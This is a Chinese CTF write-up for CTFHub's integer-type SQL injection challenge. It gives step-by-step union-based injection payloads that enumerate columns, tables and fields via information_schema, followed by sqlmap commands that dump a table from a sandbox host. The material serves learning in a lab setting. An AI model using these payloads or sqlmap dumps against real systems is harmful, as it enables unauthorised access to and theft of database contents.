CTFHub_SQL整数型注入(超详解)

Posted 独角授

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了CTFHub_SQL整数型注入(超详解)相关的知识,希望对你有一定的参考价值。

CTFHub_SQL整数型注入(超详解)

相信这个过程会帮助你理解sql注入!

首先打开环境

先尝试手注,已经说明是整数型,就直接查看字段数:

1 order by 1# 
1 order by 2# 
1 order by 3#

发现在第三步的时候没有回显,说明字段数是2。

接着判断显示位:

-1 union select 1,2#

然后查看数据库:

-1 union select database(),2#

接着获取sqli数据库中的表:

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'#

然后获取flag表中的字段名:

-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'#

最后获取flag表中flag这一列内容,拿到flag!

-1 union select flag,2 from flag#

再用sqlmap跑一下

获取数据库:

sqlmap -u "http://challenge-ef25213cf992d3e6.sandbox.ctfhub.com:10800/?id=1" --dbs

获取sqli数据库的表名:

sqlmap -u "http://challenge-ef25213cf992d3e6.sandbox.ctfhub.com:10800/?id=1" -D sqli --tables

获取sqli数据库中flag表的字段名:

sqlmap -u "http://challenge-ef25213cf992d3e6.sandbox.ctfhub.com:10800/?id=1" -D sqli -T flag --columns

获取数据库sqli中的flag表的flag这一列的详细内容:

sqlmap -u "http://challenge-ef25213cf992d3e6.sandbox.ctfhub.com:10800/?id=1" -D sqli -T flag -C flag --dump

拿到flag!

以上是关于CTFHub_SQL整数型注入(超详解)的主要内容,如果未能解决你的问题,请参考以下文章

CTFHub_SQL整数型注入(超详解)

CTFHub_SQL整数型注入(超详解)

SQLMap用户手册超详细

SQLMap用户手册超详细

SQLMap用户手册超详细

二分算法(java超详细)